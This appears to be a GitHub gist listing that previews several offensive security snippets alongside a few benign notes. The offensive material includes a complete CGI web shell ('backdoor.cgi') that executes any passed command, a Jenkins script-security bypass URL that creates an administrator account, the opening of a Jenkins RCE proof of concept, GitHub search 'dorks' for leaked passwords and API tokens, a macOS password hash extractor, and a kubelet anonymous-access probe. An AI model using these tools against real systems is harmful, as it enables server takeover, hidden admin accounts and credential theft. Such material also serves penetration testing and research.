View gist:38dcff6a0975f148aa858e924d64c492
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cd /tmp | |
mkdir cgi-bin | |
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
chmod +x ./cgi-bin/backdoor.cgi | |
python -m http.server --cgi | |
View YubiHSM2 Backed SSH Certificates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!] | |
1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/ | |
2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine. | |
3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine. | |
3. Update /etc/ssh/sshd_config on remote server to add: | |
TrustedUserCAKeys /etc/ssh/ca.pub | |
AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u | |
4. Add principals here: | |
ex: |
View Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo "" | |
echo "************ Github Dork Links (must be logged in) *******************" | |
echo "" | |
echo " password" | |
echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
echo "" | |
echo " npmrc _auth" |
View osx_extract_hash.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Mac OSX Catalina User Password Hash Extractor | |
Extracts a user's password hash as a hashcat-compatible string. | |
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
format, so previously reported methods for extracting the hash don't work. |
View auto_git_query
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
View payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
View CVE-2019-1003000-Jenkins-RCE-POC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author: Adam Jordan | |
# Date: 2019-02-15 | |
# Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc | |
# PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) | |
import argparse | |
import jenkins |
View Security Engineer - Interview Questions.md
Core Information Security
-
What is information security and how is it achieved?
-
What are the core principles of information security?
-
What is the CIA triangle?
-
What is non-repudiation (as it applies to IT security)?
View kubelet-api.md
Accessing Kubelet API
curl -sk https://localhost:10250/pods/
- If
--anonymous-auth
is turned off, you will see a401 Unauthorized
response. - If
--anonymous-auth
istrue
and--authorization-mode
isWebhook
you'll see403 Forbidden
response with messageForbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
- If
--anonymous-auth
istrue
and--authorization-mode
isAlwaysAllow
you'll see a list of pods.
NewerOlder